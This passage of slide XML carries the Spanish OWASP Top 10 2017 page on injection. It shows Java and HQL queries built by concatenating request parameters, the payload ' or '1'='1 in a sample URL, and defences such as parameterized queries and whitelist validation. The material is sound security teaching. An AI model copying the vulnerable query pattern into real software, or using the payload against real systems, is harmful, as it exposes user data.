              <a:rPr lang="es-AR" sz="1000" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Registro y Monitoreo Insuficientes</a:t>
            </a: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spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="9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Escenario #1: </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la aplicación utiliza datos no confiables en la construcción del siguiente comando SQL vulnerable:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="90488">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>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String query = "SELECT * FROM accounts WHERE custID='" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>+ request.getParameter("id") + "'";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="9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Escenario #2: </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la confianza total de una aplicación en su </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="900"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framework</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puede resultar en consultas que aún son vulnerables a inyección, por ejemplo, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="900"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Hibernate Query Language (HQL)</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90488">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>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Query HQLQuery = session.createQuery("FROM accounts WHERE custID='" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>+ request.getParameter("id") + "'");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pP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 ambos casos, al atacante puede modificar el parámetro </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="900"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“id”</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en su navegador para enviar: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="90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or '1'='1</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Por ejemplo</a:t>
            </a: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90488">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>http://example.com/app/accountView?id=' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>or '1'='1 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pP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Esto cambia el significado de ambas consultas, devolviendo todos los registros de la tabla </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="900"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“accounts”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR"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Ataques más peligrosos podrían modificar los datos o incluso invocar procedimientos almacenados</a:t>
            </a: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u="sng"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830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Una aplicación es vulnerable a ataques de este tipo cuando:</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Los datos suministrados por el usuario no son validados, filtrados o sanitizados por la aplicación.</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Se invocan consultas dinámicas o no parametrizadas, sin codificar los parámetros de forma acorde al contexto.</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Se utilizan datos dañinos dentro de los parámetros de búsqueda en consultas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="830" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Object-Relational Mapping (ORM), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>para extraer registros adicionales sensibles.</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Los datos dañinos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> se usan directamente o se concatenan, de modo que el SQL o comando resultante contiene datos y  estructuras con consultas dinámicas, comandos o procedimientos almacenados.</a:t>
            </a:r>
            <a:endParaRPr lang="es-AR" sz="83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s-AR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Algunas de las inyecciones más comunes son SQL, NoSQL, comandos de SO, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="830" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Object-Relational Mapping (ORM)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, LDAP, expresiones de lenguaje u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="830" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Object Graph Navigation Library (OGNL). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>El concepto es idéntico entre todos los intérpretes. La revisión del código fuente es el mejor método para detectar si las aplicaciones son vulnerables a inyecciones, seguido de cerca por pruebas automatizadas de todos los parámetros, encabezados, URL, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="830" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, JSON, SOAP y entradas de datos XML.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Las organizaciones pueden incluir herramientas de análisis estático (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>SAST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) y pruebas dinámicas (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>DAST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) para identificar errores de inyecciones recientemente introducidas y antes del despliegue de la aplicación en producción.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="83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200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId6"/>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spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Externos</a:t>
            </a:r>
            <a:endParaRPr lang="es-AR" sz="900" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId17"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pP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8"/>
              </a:rPr>
              <a:t>CWE-77: Command Injection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a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Para prevenir inyecciones, se requiere separar los datos de los comandos y las consultas.</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La opción preferida es utilizar una API segura, que evite el uso de un intérprete por completo y proporcione una interfaz parametrizada. Se debe migrar y utilizar una herramientas de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>Mapeo Relacional de Objetos (ORMs)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-AR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="es-AR" sz="830" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Nota:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Incluso cuando se parametrizan, los procedimientos almacenados pueden introducir una inyección SQL si el procedimiento PL/SQL o T-SQL concatena consultas y datos, o se ejecutan parámetros utilizando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="830" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>EXECUTE IMMEDIATE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="830" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>exec()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</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Realice validaciones de entradas de datos en el servidor, utilizando "listas blancas". De todos modos, esto </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="830" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>no</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> es una defensa completa ya que muchas aplicaciones requieren el uso de caracteres especiales, como en campos de texto, APIs o aplicaciones móviles.</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Para cualquier consulta dinámica residual, escape caracteres especiales utilizando la sintaxis de caracteres específica para el intérprete que se trate.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-AR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="es-AR" sz="830" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Nota: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>La estructura de SQL como nombres de tabla, nombres de columna, etc. no se pueden escapar y, por lo tanto, los nombres de estructura suministrados por el usuario son peligrosos. Este es un problema común en el software de redacción de informes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Utilice LIMIT y otros controles SQL dentro de las consultas para evitar la fuga masiva de registros en caso de inyección SQL.</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A1</a:t>
            </a:r>
            <a:endParaRPr lang="es-AR" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="2000" noProof="0" dirty="0"/>
              <a:t>:2017</a:t>
            </a:r>
            <a:endParaRPr lang="es-AR" noProof="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-AR" noProof="0" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Inyección</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="34" name="Tabelle 1"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="224274645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rgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Explotabilidad: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="9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9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AR" sz="900" b="1" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Prevalencia</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx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AR" sz="900" b="1" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Detectabilidad</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1"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9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Técnico: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9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es-AR" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Casi cualquier fuente de datos puede ser un vector de inyección: variables de entorno, parámetros, servicios web externos e internos, y todo tipo de usuarios. Los </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId24"/>
                        </a:rPr>
                        <a:t>defectos de inyección</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> ocurren cuando un atacante puede enviar información dañina a un intérprete.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es-AR" sz="900" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Estos defectos son muy comunes, particularmente en código heredado. Las vulnerabilidades de inyección se encuentran a menudo en consultas SQL, NoSQL, LDAP, XPath, comandos del SO, analizadores XML, encabezados SMTP, lenguajes de expresión, parámetros y consultas ORM.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR" sz="900" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Los errores de inyección son fáciles de descubrir al examinar el código y los escáneres y </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="900" i="1" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>fuzzers</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="900" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> ayudan a encontrarlos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es-AR" sz="900" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Una inyección puede causar divulgación, pérdida o corrupción de información, pérdida de auditabilidad, o denegación de acceso.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR" sz="900" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
